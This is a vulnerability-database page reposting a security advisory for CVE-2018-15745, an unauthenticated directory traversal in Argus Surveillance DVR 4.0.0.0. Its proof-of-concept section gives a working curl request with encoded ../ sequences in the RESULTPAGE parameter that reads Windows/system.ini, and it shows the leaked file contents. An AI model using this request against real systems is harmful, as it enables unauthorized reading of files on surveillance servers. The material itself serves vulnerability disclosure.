Vulners
Lucene search
Argus Surveillance DVR 4.0.0.0 Directory Traversal Vulnerability
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2018-15745 | 30 Aug 201800:00 | – | attackerkb |
 | CVE-2018-15745 | 29 Aug 201800:00 | – | circl |
 | Argus Surveillance DVR Directory Traversal (CVE-2018-15745) | 31 May 202000:00 | – | checkpoint_advisories |
 | CVE-2018-15745 | 30 Aug 201817:00 | – | cve |
 | CVE-2018-15745 | 30 Aug 201817:00 | – | cvelist |
 | Argus Surveillance DVR 4.0.0.0 - Directory Traversal | 1 Feb 202518:54 | – | metasploit |
 | Argus Surveillance DVR 4.0.0.0 - Local File Inclusion | 8 Jun 202604:09 | – | nuclei |
 | CVE-2018-15745 | 30 Aug 201817:29 | – | nvd |
 | Argus Surveillance DVR Multiple Vulnerabilities | 29 Aug 201800:00 | – | openvas |
 | Argus Surveillance DVR 4.0.0.0 Directory Traversal | 29 Aug 201800:00 | – | packetstorm |
10
[+] Credits: John Page (aka hyp3rlinx)
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
[+] ISR: Apparition Security
Greetz: ***Greetz: indoushka | Eduardo | GGA***
[Vendor]
www.argussurveillance.com
[Product]
Argus Surveillance DVR - 4.0.0.0
Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.
[Vulnerability Type]
Directory Traversal
[CVE Reference]
CVE-2018-15745
[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure
via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
[Affected Component]
WEBACCOUNT.CGI RESULTPAGE parameter
[Exploit/POC]
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv
[Video POC URL]
https://vimeo.com/287115273
# 0day.today [2018-08-29] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Aug 2018 00:00Current
EPSS0.87945